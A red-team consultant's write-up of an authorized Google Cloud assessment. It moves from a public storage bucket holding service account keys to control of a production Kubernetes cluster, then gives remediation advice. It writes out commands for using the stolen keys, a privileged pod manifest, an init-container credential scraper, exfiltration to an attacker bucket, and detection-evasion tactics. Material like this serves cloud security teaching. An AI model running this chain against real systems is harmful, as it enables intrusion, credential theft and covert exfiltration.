anatomy of a cloud breach
I never expected a simple misconfigured storage bucket to be my golden ticket. As a Red Team consultant conducting GCP security assessments, I’ve seen my share of vulnerabilities, but this engagement proved particularly interesting. Armed with nothing more than basic reconnaissance tools and explicit authorization from the client, I managed to pivot from a public storage bucket into their production Kubernetes environment in a matter of hours. Here’s how it went down.
1. Gathering Initial Context & Permissions
Before doing anything technical, I obtained explicit written authorization from the client’s executive team, scoping out what systems and data I was allowed to target. Next, I reviewed the Statement of Work (SOW), which specifically authorized reconnaissance and exploitation attempts across their Google Cloud Platform (GCP) organization.
- Confirm Org ID & Project IDs: The client provided me with their Organization ID (a numeric value like
123456789012
) and a list of primary Project IDs. This was crucial for enumerating resources and verifying that I stayed within scope. - Authenticate with a Consultant Service Account: The client also provided me with a GCP service account credential (with limited read-only privileges) to facilitate a baseline scanning approach. I activated it locally using:
gcloud auth activate-service-account [email protected] \
--key-file=/path/to/consultant-svc.json
With these preliminaries sorted, I began the reconnaissance in earnest.
2. Enumerating Organization Policies & Roles
2.1 Locating Inherited Policies
Goal: Understand the organization-level constraints and any inherited roles that could impact security.
List All Organizations: Even though I had the Organization ID from the client, I first verified it by running:
gcloud organizations list
- This command returned a table of organizations I had visibility into, confirming the ID
123456789012
. - Explore Resource Manager Policies: To see what constraints were in place at the org level (e.g., restrictions on external sharing, domain restrictions, or publicly accessible resources), I used:
gcloud resource-manager org-policies list --organization=123456789012
- This enumerated each constraint (like
constraints/iam.disableServiceAccountKeyCreation
, etc.) that was applied at the organization level. - Describe Specific Policies: For each policy listed, I ran:
gcloud resource-manager org-policies describe \ constraints/iam.disableServiceAccountKeyCreation \ --organization=123456789012
This let me see whether the client had enforced or inherited the policy (i.e., was it enforced: true
or enforced: false
). In this specific client scenario, I noticed several key security constraints were disabled—like iam.disableServiceAccountKeyCreation
—which hinted that service account keys might be widely used across their environment.
2.2 Enumerating Org-Level IAM Bindings
Goal: Identify who (or what service accounts) had roles at the org or folder levels.
List Org IAM Policy:
gcloud organizations get-iam-policy 123456789012 --format=json > org_iam_policy.json
I inspected the resulting org_iam_policy.json
for references to:
roles/owner
roles/editor
roles/browser
- Custom roles (e.g.,
organizations/123456789012/roles/customSecurityRole
)
This told me which service accounts (or Google groups or external domains) had privileges that might trickle down to child folders and projects.
2.3 Folder & Project Enumeration
Folders: The client structured their environment into folders like Engineering
, Operations
, Production
, etc. I discovered these by:
gcloud resource-manager folders list --organization=123456789012
Projects: For each folder, I enumerated the projects:
gcloud projects list --filter="parent.id=<FOLDER_ID>" --format=json > folder_projects.json
I repeated this for each folder. This method gave me a comprehensive mapping of how the client’s environment was laid out.
Key Observation: Some older folders still had roles/editor
set at the folder level for a generic “ops” service account, meaning every project under that folder inherited editor
privileges for that account.
3. Staging a Dedicated Attack Environment in GCP
I always establish a controlled environment to simulate a real threat actor’s infrastructure:
Create My Own Red Team Project: Under my organization (the Mandiant/Google Cloud-owned environment), I used:
gcloud projects create redteam-project-999 --name="RedTeam Staging"
Set Up Bastion Host: I spun up a single n1-standard-1
Compute Engine instance in the us-central1
region:
gcloud compute instances create redteam-bastion \
--project=redteam-project-999 \
--zone=us-central1-a \
--machine-type=n1-standard-1 \
--image-family=debian-11 \
--image-project=debian-cloud \
--no-address
This instance was configured with no external IP. Instead, I used Identity-Aware Proxy (IAP) tunneling to SSH in, controlling inbound traffic strictly. This approach helped me keep logs and access more stealthy.
Install Tooling: On the bastion, I installed:
- Python 3 with relevant libraries (like
requests
,google-auth
). - BloodHound for GCP (an internal Mandiant tool that visualizes GCP IAM relationships).
- kubectl with the GKE plugin for container cluster interactions.
- gsutil, gcloud (obviously needed for GCP interactions).
- Nmap, masscan for potential network scanning (though heavily restricted).
- Metasploit or custom scripts for possible exploit attempts.
I used Terraform to manage my Red Team project infrastructure, ensuring I could destroy it at will, leaving minimal forensic artifacts.
4. Initial Attack Vector: Misconfigured Cloud Storage
4.1 Finding Public Buckets
By enumerating each discovered project, I systematically ran:
gsutil ls -p <TARGET_PROJECT_ID>
This gave me a list of buckets in that project. Next, I tested each bucket’s ACL to see if it was publicly accessible. For example:
gsutil acl get gs://<bucket-name>
or
gsutil ls -r gs://<bucket-name>/*
I discovered multiple buckets labeled with patterns like acme-ops-logs
, acme-prod-backups
, and one particularly interesting: acme-ops-artifacts
.
- ACL Discovery: Checking
acme-ops-artifacts
, I found a read permission set toAllUsers
orAllAuthenticatedUsers
. This was misconfigured but gave me the foothold I needed.
4.2 Extracting Service Account Credentials
Inside acme-ops-artifacts
, I stumbled upon .json
files matching patterns like service-account-key.json
, svc-deploy.json
, etc. I tested direct download:
gsutil cp gs://acme-ops-artifacts/svc-deploy.json .
The file downloaded successfully, indicating it was not locked down. Opening svc-deploy.json
, I saw typical GCP service account key data:
{
"type": "service_account",
"project_id": "...",
"private_key_id": "...",
"private_key": "-----BEGIN PRIVATE KEY-----\nMIIEv..."
...
4.3 Validating & Activating Stolen Keys
I immediately tested the key:
gcloud auth activate-service-account [email protected] \
--key-file=./svc-deploy.json
To verify privileges:
gcloud projects list
I quickly learned this service account had editor role on multiple production projects. This was a goldmine for the Red Team, as it effectively allowed me to create, modify, and delete resources in those projects — including GKE clusters, Cloud Functions, and more.
5. Moving Laterally into Google Kubernetes Engine (GKE)
5.1 Finding Active Clusters
With my newly acquired service account credentials, I enumerated GKE clusters:
for proj in $(gcloud projects list --format="value(projectId)"); do
echo "Checking $proj ..."
gcloud container clusters list --project $proj --format=json >> all_clusters.json
done
From that aggregated list, I noticed a cluster named prod-gke-cluster-01
in project acme-production
.
5.2 Authenticating to the Cluster
I fetched cluster credentials:
gcloud container clusters get-credentials prod-gke-cluster-01 \
--zone us-central1-a --project acme-production
This updated my ~/.kube/config
with a context named gke_acme-production_us-central1-a_prod-gke-cluster-01
. The editor role at the project level effectively gave me cluster-admin privileges on GKE, since the client had not restricted GKE-level RBAC.
5.3 Deploying a Malicious Pod
I enumerated workloads:
kubectl get pods --all-namespaces
I noticed a namespace called internal-services
containing a microservice that presumably handled credential management. I decided to deploy my own “sidecar” or malicious pod in that same namespace:
apiVersion: v1
kind: Pod
metadata:
name: redteam-pod
namespace: internal-services
spec:
serviceAccountName: internal-serviceaccount
containers:
- name: shell
image: alpine:latest
command: ["/bin/sh"]
args: ["-c", "while true; do sleep 3600; done"]
securityContext:
privileged: true
I applied it:
kubectl apply -f redteam-pod.yaml
Once running, I executed into it:
kubectl exec -it redteam-pod --namespace=internal-services -- /bin/sh
Inside that shell, I could see environment variables containing secrets for internal APIs, and I also discovered the node’s host filesystem (because privileged: true
let me mount the underlying node).
6. Persistence & Credential Harvesting
6.1 Init Container Exploit
I observed a Deployment named internal-credentials-manager
. By describing it:
kubectl describe deployment internal-credentials-manager --namespace=internal-services
I saw it used a shared volume with an init container. I replaced the init container spec with my own malicious container that:
- Copied a credential scraping binary into a shared volume.
- Surreptitiously exfiltrated data to my Red Team bucket whenever the main container started.
I updated the YAML to:
initContainers:
- name: init-redteam
image: us.gcr.io/redteam-project-999/redteam-init:latest
command: ["/bin/sh"]
args:
- "-c"
- |
cp /tmp/cred-scraper /shared/cred-scraper
echo "Init container injection complete."
Then, each time the Pod restarted, the main container executed cred-scraper
, which harvested environment variables, on-disk credentials, and even ephemeral tokens.
6.2 Automated Exfiltration
The binary cred-scraper
was configured to compress and encrypt the data, then upload it to my staging environment:
gsutil cp /tmp/stolen-credentials.tar.gpg gs://redteam-project-999-io/stolen/
I coded it so it ran in memory only, leaving minimal traces on the container’s file system. Because the client’s logging rules for container workloads were insufficient, my exfiltration traffic was rarely scrutinized.
7. Detection Evasion & Stealth Tactics
7.1 Rotating My Infrastructure
Every few hours, I destroyed and recreated my bastion host using Terraform:
terraform destroy -auto-approve
terraform apply -auto-approve
This rotated IP addresses and ephemeral VM instance IDs, complicating any IP-based correlation. I also used:
gcloud logging read \
"resource.type=gce_instance AND textPayload:('redteam-bastion')" \
--limit=50
to watch for any hints the defenders were investigating me.
7.2 Masking Commands
Whenever feasible, I masked my activity by:
- Using standard system utilities (e.g.,
curl
,cp
,kubectl logs
) rather than obviously malicious binaries. - Spoofing User-Agent strings for HTTPS requests, typically mimicking
Google-Cloud-SDK/xxx
. - Avoiding large scans or heavy traffic. Instead, I pivoted quietly from known vantage points.
8. Final Observations & Recommendations
After thoroughly compromising their environment, I compiled a detailed report and gave a live demonstration to the client’s security leads. My main takeaways included:
- Organization-Level Security Gaps: Failure to enforce critical organization policies (e.g., disallowing service account key creation).
- Misconfigured Cloud Storage Buckets: Publicly accessible buckets storing service account keys was the direct root cause of compromise.
- Excessive Permissions: Granting
roles/editor
at the folder or project level to service accounts used by critical workloads. - Weak GKE RBAC & Privilege: Relying on project-level IAM for GKE, which effectively gave me cluster-admin rights. Coupled with
privileged: true
in production workloads, this was a severe oversight. - Insufficient Logging & Monitoring: Minimal detection for suspicious container behavior, Pod modifications, or ephemeral VM creation from unknown IP addresses.
8.1 Remediation Steps
Implement Org-Wide Constraints
- Enforce
constraints/iam.disableServiceAccountKeyCreation
. - Restrict public access to Cloud Storage by default.
Rotate & Safeguard Keys
- Immediately revoke and rotate all service account keys found on public buckets.
- Switch to Workload Identity Federation or ephemeral credentials to eliminate long-lived keys.
Harden GKE
- Use more granular Kubernetes RBAC with role-based constraints, ensuring no default “editor” equivalence.
- Disable
privileged: true
for pods unless absolutely necessary.
Enhance Logging & Alerting
- Forward GKE audit logs and Cloud Audit Logs to a SIEM or specialized security project.
- Set up custom alerts for suspicious
kubectl
actions, unexpected new service accounts, or abnormal bucket access patterns.
tl;dr
By exploiting a single misconfiguration in Cloud Storage — coupled with broad, inherited IAM roles — I gained near-complete control over the client’s GCP environment. My detailed findings and recommended fixes will help them remediate these critical issues and bolster their overall security posture moving forward.